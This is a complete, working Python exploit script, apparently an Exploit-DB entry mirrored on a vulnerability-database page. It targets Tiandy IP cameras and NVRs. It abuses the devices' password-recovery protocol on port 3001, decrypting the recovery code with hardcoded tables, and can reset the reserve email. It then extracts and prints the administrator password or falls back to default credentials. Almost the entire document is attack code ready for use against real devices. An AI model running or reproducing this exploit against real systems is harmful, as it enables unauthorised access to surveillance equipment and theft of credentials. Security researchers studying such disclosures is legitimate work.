`# Exploit Title: Tiandy IPC and NVR 9.12.7 - Credential Disclosure
# Date: 2020-09-10
# Exploit Author: zb3
# Vendor Homepage: http://en.tiandy.com
# Product Link: http://en.tiandy.com/index.php?s=/home/product/index/category/products.html
# Software Link: http://en.tiandy.com/index.php?s=/home/article/lists/category/188.html
# Version: DVRS_V9.12.7, DVRS_V11.7.4, NVSS_V13.6.1, NVSS_V22.1.0
# Tested on: Linux
# CVE: N/A
# Requires Python 3 and PyCrypto
# For more details and information on how to escalate this further, see:
# https://github.com/zb3/tiandy-research
import sys
import hashlib
import base64
import socket
import struct
from Crypto.Cipher import DES
def main():
if len(sys.argv) != 2:
print('python3 %s [host]' % sys.argv[0], file=sys.stderr)
exit(1)
host = sys.argv[1]
conn = Channel(host)
conn.connect()
crypt_key = conn.get_crypt_key(65536)
attempts = 2
tried_to_set_mail = False
ok = False
while attempts > 0:
attempts -= 1
code = get_psw_code(conn)
if code == False:
# psw not supported
break
elif code == None:
if not tried_to_set_mail:
print("No PSW data found, we'll try to set it...", file=sys.stderr)
tried_to_set_mail = True
if try_set_mail(conn, '[email protected]'):
code = get_psw_code(conn)
if code == None:
print("couldn't set mail", file=sys.stderr)
break
rcode, password = recover_with_code(conn, code, crypt_key)
if rcode == 5:
print('The device is locked, try again later.', file=sys.stderr)
break
if rcode == 0:
print('Admin', password)
ok = True
break
if tried_to_set_mail:
try_set_mail(conn, '')
if not code:
print("PSW is not supported, trying default credentials...", file=sys.stderr)
credentials = recover_with_default(conn, crypt_key)
if credentials:
user, pw = credentials
print(user, pw)
ok = True
if not ok:
print('Recovery failed', file=sys.stderr)
exit(1)
def try_set_mail(conn, target):
conn.send_msg(['PROXY', 'USER', 'RESERVEPHONE', '2', '1', target, 'FILETRANSPORT'])
resp = conn.recv_msg()
return resp[4:7] == ['RESERVEPHONE', '2', '1']
def get_psw_code(conn):
conn.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(b'Admin').decode(), base64.b64encode(b'Admin').decode(), '', '65536', 'UTF-8', '0', '1'])
resp = conn.recv_msg()
if resp[4] != 'FINDPSW':
return False
psw_reg = psw_data = None
if len(resp) > 7:
psw_reg = resp[6]
psw_data = resp[7]
if not psw_data:
return None
psw_type = int(resp[5])
if psw_type not in (1, 2, 3):
raise Exception('unsupported psw type: '+str(psw_type))
if psw_type == 3:
psw_data = psw_data.split('"')[3]
if psw_type == 1:
psw_data = psw_data.split(':')[1]
psw_key = psw_reg[:0x1f]
elif psw_type in (2, 3):
psw_key = psw_reg[:4].lower()
psw_code = td_decrypt(psw_data.encode(), psw_key.encode())
code = hashlib.md5(psw_code).hexdigest()[24:]
return code
def recover_with_code(conn, code, crypt_key):
conn.send_msg(['IP', 'USER', 'SECURITYCODE', code, 'FILETRANSPORT'])
resp = conn.recv_msg()
rcode = int(resp[6])
if rcode == 0:
return rcode, decode(resp[8].encode(), crypt_key).decode()
return rcode, None
def recover_with_default(conn, crypt_key):
res = conn.login_with_key(b'Default', b'Default', crypt_key)
if not res:
return False
while True:
msg = conn.recv_msg()
if msg[1:5] == ['IP', 'INNER', 'SUPER', 'GETUSERINFO']:
return decode(msg[6].encode(), crypt_key).decode(), decode(msg[7].encode(), crypt_key).decode()
###
### lib/des.py
###
def reverse_bits(data):
return bytes([(b * 0x0202020202 & 0x010884422010) % 0x3ff for b in data])
def pad(data):
if len(data) % 8:
padlen = 8 - (len(data) % 8)
data = data + b'\x00' * (padlen-1) + bytes([padlen])
return data
def unpad(data):
padlen = data[-1]
if 0 < padlen <= 8 and data[-padlen:-1] == b'\x00'*(padlen-1):
data = data[:-padlen]
return data
def encrypt(data, key):
cipher = DES.new(reverse_bits(key), 1)
return reverse_bits(cipher.encrypt(reverse_bits(pad(data))))
def decrypt(data, key):
cipher = DES.new(reverse_bits(key), 1)
return unpad(reverse_bits(cipher.decrypt(reverse_bits(data))))
def encode(data, key):
return base64.b64encode(encrypt(data, key))
def decode(data, key):
return decrypt(base64.b64decode(data), key)
###
### lib/binproto.py
###
def recvall(s, l):
buf = b''
while len(buf) < l:
nbuf = s.recv(l - len(buf))
if not nbuf:
break
buf += nbuf
return buf
class Channel:
def __init__(self, ip, port=3001):
self.ip = ip
self.ip_bytes = socket.inet_aton(ip)[::-1]
self.port = port
self.msg_seq = 0
self.data_seq = 0
self.msg_queue = []
def fileno(self):
return self.socket.fileno()
def connect(self):
self.socket = socket.socket()
self.socket.connect((self.ip, self.port))
def reconnect(self):
self.socket.close()
self.connect()
def send_cmd(self, data):
self.socket.sendall(b'\xf1\xf5\xea\xf5' + struct.pack('<HH8xI', self.msg_seq, len(data) + 20, len(data)) + data)
self.msg_seq += 1
def send_data(self, stream_type, data):
self.socket.sendall(struct.pack('<4sI4sHHI', b'\xf1\xf5\xea\xf9', self.data_seq, self.ip_bytes, 0, len(data) + 20, stream_type) + data)
self.data_seq += 1
def recv(self):
hdr = recvall(self.socket, 20)
if hdr[:4] == b'\xf1\xf5\xea\xf9':
lsize, stream_type = struct.unpack('<14xHI', hdr)
data = recvall(self.socket, lsize - 20)
if data[:4] != b'NVS\x00':
print(data[:4], b'NVS\x00')
raise Exception('invalid data header')
return None, [stream_type, data[8:]]
elif hdr[:4] == b'\xf1\xf5\xea\xf5':
lsize, dsize = struct.unpack('<6xH10xH', hdr)
if lsize != dsize + 20:
raise Exception('size mismatch')
msgs = []
for msg in recvall(self.socket, dsize).decode().strip().split('\n\n\n'):
msg = msg.split('\t')
if '.' not in msg[0]:
msg = [self.ip] + msg
msgs.append(msg)
return msgs, None
else:
raise Exception('invalid packet magic: ' + hdr[:4].hex())
def recv_msg(self):
if len(self.msg_queue):
ret = self.msg_queue[0]
self.msg_queue = self.msg_queue[1:]
return ret
msgs, _ = self.recv()
if len(msgs) > 1:
self.msg_queue.extend(msgs[1:])
return msgs[0]
def send_msg(self, msg):
self.send_cmd((self.ip+'\t'+'\t'.join(msg)+'\n\n\n').encode())
def get_crypt_key(self, mode=1, uname=b'Admin', pw=b'Admin'):
self.send_msg(['IP', 'USER', 'LOGON', base64.b64encode(uname).decode(), base64.b64encode(pw).decode(), '', str(mode), 'UTF-8', '805306367', '1'])
resp = self.recv_msg()
if resp[4:6] != ['LOGONFAILED', '3']:
print(resp)
raise Exception('unrecognized login response')
crypt_key = base64.b64decode(resp[8])
return crypt_key
def login_with_key(self, uname, pw, crypt_key):
self.reconnect()
hashed_uname = base64.b64encode(hashlib.md5(uname.lower()+crypt_key).digest())
hashed_pw = base64.b64encode(hashlib.md5(pw+crypt_key).digest())
self.send_msg(['IP', 'USER', 'LOGON', hashed_uname.decode(), hashed_pw.decode(), '', '1', 'UTF-8', '1', '1'])
resp = self.recv_msg()
if resp[4] == 'LOGONFAILED':
return False
self.msg_queue = [resp] + self.msg_queue
return True
def login(self, uname, pw):
crypt_key = self.get_crypt_key(1, uname, pw)
if not self.login_with_key(uname, pw, crypt_key):
return False
return crypt_key
###
### lib/crypt.py
###
pat = b'abcdefghijklmnopqrstuvwxyz0123456789'
def td_asctonum(code):
if code in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
code += 0x20
if code not in pat:
return None
return pat.index(code)
def td_numtoasc(code):
if code < 36:
return pat[code]
return None
gword = [
b'SjiW8JO7mH65awR3B4kTZeU90N1szIMrF2PC',
b'04A1EF7rCH3fYl9UngKRcObJD6ve8W5jdTta',
b'brU5XqY02ZcA3ygE6lf74BIG9LF8PzOHmTaC',
b'2I1vF5NMYd0L68aQrp7gTwc4RP9kniJyfuCH',
b'136HjBIPWzXCY9VMQa7JRiT4kKv2FGS5s8Lt',
b'Hwrhs0Y1Ic3Eq25a6t8Z7TQXVMgdePuxCNzJ',
b'WAmkt3RCZM829P4g1hanBluw6eVGSf7E05oX',
b'dMxreKZ35tRQg8E02UNTaoI76wGSvVh9Wmc1',
b'i20mzKraY74A6qR9QM8H3ecUkBlpJC1nyFSZ',
b'XCAUP6H37toQWSgsNanf0j21VKu9T4EqyGd5',
b'dFZPb9B6z1TavMUmXQHk7x402oEhKJD58pyG',
b'rg8V3snTAX6xjuoCYf519BzWRtcMl2OiZNeI',
b'dZe620lr8JW4iFhNj3K1x59Una7PXsLGvSmB',
b'5yaQlGSArNzek6MXZ1BPOE3xV470h9KvgYmb',
b'f12CVxeQ56YWd7OTXDtlnPqugjJikELayvMs',
b'9Qoa5XkM6iIrR7u8tNZgSpbdDUWvwH21Kyzh',
b'AqGWke65Y2ufVgljEhMHJL01D8Zptvcw7CxX',
b't960P2inR8qEVmAUsDZIpH5wzSXJ43ob1kGW',
b'4l6SAi2KhveRHVN5JGcmx9jOC3afB7wF0ITq',
b'tEOp6Xo87QzPbn24J3i9FjWKS1lIBVaMZeHU',
b'zx27DH915lhs04aMJOgf6Z3pyERrGndiLwIe',
b'8XxOBzZ02hUWDQfvL471q9RC6sAaJVFuTMdG',
b'jON0i4C6Z3K97DkbqSypH8lRmx5o2eIwXas1',
b'OIGT0ubwH1x6hCvEgBn274A5Q8K9e3YyzWlm',
b'zgejY41CLwRNabovBUP2Aql7FVM8uEDXZQ0c',
b'Z2MpQE91gdRLYJ8bGIWyOfc4v03Hjzs6VlU5',
b't6PuvrBXeoHk5FJW08DYQSI49GCwZ27cA1UK',
b'FiBA53IMW97kYNz82GhHf1yUCdL0nlvRD46s',
b'2Vz3b06h54jmc7a8AIYtNHM1iQU9wBXWyJkR',
b'wyI42azocV3UOX6fk579hMH8eEGJsgFuBmqb',
b'TxmnK4ljJ9iroY8vVtg3Rae2L516fBWUuXAS',
b'z6Y1bPrJEln0uWeLKkjo9IZ2y7ROcFHqBm54',
b'x064LFB39TsXeryqvt2pZN8QIERuWAVUmwjJ',
b'76qg85yB31uH90YbZofsjKrRGiTVndAEtFMx',
b'WjwTEbCA752kq89shcaLB1xO64rgMYnoFiJQ',
b'u6307O4J2DeZs8UYyjlzfX91KGmavEdwTRSg'
]
def td_decrypt(data, key):
kdx = 0
ret = []
for idx, code in enumerate(data):
while True:
if kdx >= len(key):
kdx = 0
kcode = key[kdx]
knum = td_asctonum(kcode)
if knum is None:
kdx += 1
continue
break
if code not in gword[knum]:
return None
cpos = gword[knum].index(code)
ret.append(td_numtoasc(cpos))
kdx += 1
return bytes(ret)
if __name__ == '__main__':
main()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation